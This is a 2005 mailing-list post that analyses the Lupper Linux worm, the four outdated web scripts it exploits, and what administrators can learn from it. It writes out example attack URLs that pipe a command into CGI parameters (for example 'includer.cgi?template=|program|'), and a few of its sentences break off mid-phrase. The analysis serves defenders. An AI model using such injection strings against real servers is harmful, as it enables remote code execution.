[conspire] Lupper redux

Rick Moen rick at linuxmafia.com
Wed Dec 14 02:10:00 PST 2005

Since http://linuxmafia.com/~rick/faq/index.php?page=virus#virus5
aspires to document all Linux malware, I've just caught up regarding the
Lupper worm:

NAME:  Lupper (Lupii, Plupii)
APPEARED:  Nov. 11, 2005.
VULNERABLE:  PHPXMLRPC messaging library v. 1.1.1, via URL input
validation bug enabling execution of arbitrary PHP.  Fixed Aug. 8, 2005.
VULNERABLE:  AWstats Web-statistics Perl CGI script, v. 6.3, via a URL
input validation bug.  Fixed June 10, 2005.
VULNERABLE:  Darryl C. Burgdorf's WebHints proprietary "thought for the
day" Perl CGI script, v. 1.02, has _zero_ URL input validation, a design
failure publicised May 9, 2005.  (References to v. 1.03 and 1.3 are in
VULNERABLE:  Jimmy's "The Includer" proprietary SSI-emulation Perl CGI
script v. 1.1, has _zero_ URL input validation, a design failure
publicised March 3, 2005.

This worm -- exploiting vulnerabilities already fixed or eliminated for
three, five, six, and eight months, respectively -- derived from the
earlier Slapper worm codebase.  Thus far, it exists only as an i386 Linux
binary, fetched to target Web servers' /tmp directory by one of the four
obsolete, vulnerable Web apps, and then run as httpd.  One of those
exploits (against PHPXMLRPC) would work equally well (after recompiling
the worm) on any operating system.  The others invoke Bourne-like shells
(and thus are feasible on any Unix, but on MS-Windows only with Cygwin,
etc.).  The AWstats exploit also calls wget, via buggily-parsed URL input
of the form "configdir=|program".

The Includer and WebHints CGIs' failures to validate input are total:
URLs "http://www.example.com/hints.pl?|program|",
"http://www.example.com/includer.cgi?|program|", and
"http://www.example.com/includer.cgi?template=|program|" all remotely
execute "program".  However, it's important to note that 
_neither is packaged_ by Linux istributions:  Either would have to be
downloaded and installed manually by an admin of uncommonly bad

The AWstats CGI, by contrast, is sometimes packaged but never to the
best of my ability to tell installed by default, in any Linux
distribution:  It has historically been notorious for input validation
flaws, and thus is best run in its optional configuration that generates
static HTML pages (http://www.debian-administration.org/articles/85) ,
rather than its default CGI mode.

PHPXMLRPC is usually offered via optional, supplemental PHP-add-ons
packages but is never to the best of my ability to tell installed by
default, in any Linux distribution.  Like the related and identically
vulnerable (fixed the same day, but not attacked so far by this worm)
PEAR XML-RPC v. 1.3.3 messaging library, it would probably get installed
as part of overfeatured, developed PHP-based Web applications such as
Ampache, b2evolution, egroupware, MailWatch for MailScanner, Nucleus
CMS, phpmyfaq, phpPgAds, phpgroupware, PostNuke, TikiWiki, and Xaraya;
plus older versions of Civicspace and Drupal.

(The two PHP-coded XML-RPC implementations should not be confused with
PHP's optional xmlrpc-epi extension, in C, included with PHP since v.
4.10, or various other non-PHP implementations.)

One lesson that's common to all of those exploits is that Linux
Web-server admins need to be extra careful of applications that will
process public data, e.g., via URL input, and doubly careful (lest they
miss needed fixes) of any they choose to install outside their
distributions' regular maintenance regimes.  As it happens, the worm
requires rather rare (not to mention old) Web-app vulnerabilties, and
extremely few systems have been reported affected.  ("Affected" means
that the attacker can compromise the httpd process but not the Web host
as a whole, without some separate and more serious method to compromise
the machine.)

More information about the conspire mailing list